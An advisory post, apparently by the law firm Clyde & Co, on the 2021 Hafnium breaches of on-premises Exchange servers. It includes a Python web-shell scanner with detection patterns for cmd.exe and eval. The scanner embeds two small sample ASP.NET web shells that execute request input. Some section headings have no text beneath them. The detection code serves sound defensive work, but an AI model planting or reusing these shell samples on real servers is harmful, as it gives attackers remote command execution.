A significant number of Microsoft Exchange servers have been breached worldwide over the last fortnight due to a chain of vulnerabilities. While the full extent of the attacks and their impacts are not yet clear, it has been suggested that over 100,000 Exchange servers may have been breached. This post explains the background to the incident, who is impacted and what organisations need to do.
Microsoft has attributed the threat activity to a group it tracks as ‘Hafnium’. Microsoft released emergency, out-of-band security updates to patch four vulnerabilities in on-premises Exchange Server 2013, 2016 and 2019 (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065) after it found that attackers were chaining them to gain unauthenticated access to Exchange servers, read mailbox contents and write files to the server.
Whilst the extent of the intrusion varies on a case-by-case basis, many incidents have seen the threat actor gain administrator-level privileges on the server, which complicates containment and remediation. Microsoft has also observed threat actors planting ‘web shells’ to obtain persistent access to compromised Exchange servers. A web shell is a small script dropped into a web-accessible directory; once in place, it allows a threat actor to reach the server remotely over ordinary HTTP, execute commands, exfiltrate data and install further malware to extend their unauthorised access into the wider network. Web shells can be difficult to detect because they are typically tiny, blend in with legitimate web content, and threat actors often obfuscate or encrypt their traffic to hide their actions, so simply patching the server does not remove access that has already been established.
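As an added illustration of what hunting for planted web shells looks like in practice (example code written for this page, not Microsoft's or Clyde & Co's tooling, and not a published indicator list), the script below walks a web content directory, flags ASP.NET pages that contain typical web shell constructs (command execution, script evaluation, attacker input read straight from the HTTP request) and separately flags pages modified after a cut-off date, since a freshly written .aspx file in an Exchange web directory warrants a look regardless of its contents. The indicator patterns, the file names and the sample pages are all constructed for the example; the cut-off date is an assumed one.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Indicator patterns for ASP.NET web shells (assumed for this example; not a
# published IOC list): command execution, script evaluation, attacker input
# read straight from the HTTP request, and reflective assembly loading.
SUSPICIOUS = {
    "process_exec": re.compile(r"Process\.Start\s*\(|\.StartInfo\b|\bProcessStartInfo\b", re.I),
    "cmd_shell": re.compile(r"\bcmd(\.exe)?\b|\bpowershell(\.exe)?\b", re.I),
    "script_eval": re.compile(r"\beval\s*\(|JScript\.Eval\b", re.I),
    "request_input": re.compile(r"\bRequest(\.(Form|QueryString|Headers|Item))?\s*\[", re.I),
    "reflective_load": re.compile(r"Assembly\.Load\b", re.I),
}
WEB_EXT = {".aspx", ".ashx", ".asmx", ".asp"}


def scan_webroot(root, created_after=None):
    """Walk a web content directory and return files that either match a
    web shell indicator or were modified on/after `created_after` (a tz-aware
    datetime). Results are keyed by path relative to `root`."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in WEB_EXT:
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    body = fh.read()
            except OSError:
                continue
            hits = [label for label, rx in SUSPICIOUS.items() if rx.search(body)]
            mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc)
            recent = created_after is not None and mtime >= created_after
            if hits or recent:
                findings[os.path.relpath(path, root)] = {"patterns": hits, "recent": recent}
    return findings


# Constructed sample files (not real artefacts from any incident).
SAMPLES = {
    # Legitimate page: no indicators, and backdated in demo() to predate the attacks.
    "logon.aspx": (
        '<%@ Page Language="C#" AutoEventWireup="true" %>\n'
        "<html><body><h1>Outlook Web App</h1><p>Sign in to continue.</p></body></html>\n"
    ),
    # One-line JScript shell that evaluates whatever arrives in a request field.
    "error.aspx": (
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>\n'
    ),
    # C# shell that hands a request parameter to cmd.exe.
    "help.aspx": (
        '<%@ Page Language="C#" %>\n'
        "<% var p = new System.Diagnostics.Process();\n"
        '   p.StartInfo.FileName = "cmd.exe";\n'
        '   p.StartInfo.Arguments = "/c " + Request["c"];\n'
        "   p.Start(); %>\n"
    ),
}


def demo():
    """Write the constructed samples to a temporary directory and scan them,
    treating anything modified on or after 26 Feb 2021 (UTC, an assumed
    cut-off) as recent. Returns the scan findings."""
    cutoff = datetime(2021, 2, 26, tzinfo=timezone.utc)
    old = datetime(2019, 1, 1, tzinfo=timezone.utc).timestamp()
    with tempfile.TemporaryDirectory() as root:
        for name, body in SAMPLES.items():
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        # Backdate the legitimate page so only the planted files look recent.
        os.utime(os.path.join(root, "logon.aspx"), (old, old))
        return scan_webroot(root, created_after=cutoff)


if __name__ == "__main__":
    for rel, info in demo().items():
        print(f"{rel}: patterns={info['patterns']} recent={info['recent']}")
```

On a real server you would point scan_webroot at the IIS and Exchange web content directories with a cut-off set to the earliest date of suspected compromise. Treat any hit as evidence to preserve for the incident response team rather than something to delete on the spot: the file's timestamps and the corresponding IIS request logs are what establish when access was gained and what was done with it.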
Who is impacted?
The full extent of the attacks and their impacts is not yet clear, but the estimate of over 100,000 breached Exchange servers indicates that exploitation has been broad and largely automated rather than targeted. Clyde & Co therefore recommends that entities running Exchange Server err on the side of caution and take the position that their servers are likely to be affected until there is evidence to indicate otherwise. Because the vulnerabilities lie in on-premises Exchange servers, entities that strictly use Microsoft’s cloud-based email service (Exchange Online, part of Office 365) are unlikely to be affected. Note, however, that hybrid deployments still run an on-premises Exchange server (often retained for management purposes), and that server is exposed in the same way as any other.
According to Microsoft, Hafnium is primarily focused on exfiltrating data from U.S. entities across many sectors, including infectious disease research, law firms, higher education, defence contractors, policy think tanks and non-government organisations. Despite this, thousands of entities outside the United States are reported to have been subject to the attacks as well. Clyde & Co’s cyber incident response team has already seen a number of incidents within Australian businesses that can be attributed to these Microsoft Exchange vulnerabilities.
What do organisations need to do?
Where do you go for more information?
How can we help?
Clyde & Co has the largest dedicated, and rapidly expanding, cyber incident response practice in Australia and New Zealand. Our experienced team has dealt with thousands of data breach and technology-related disputes in recent times, including a number of the largest and most complex incidents in Asia Pacific to date.
From pre-incident readiness and breach response through to the defence of regulatory investigations and proceedings, as well as recovery actions against wrongdoers, we assist clients globally across the full cyber lifecycle. Our team is also highly regarded for its expertise and experience in managing all forms of disputes across sectors, including advising on some of the most newsworthy class actions commenced in Australia.
Our 24 hour cyber incident response hotline or email allows you to access our team directly around the clock. For more information, contact us on: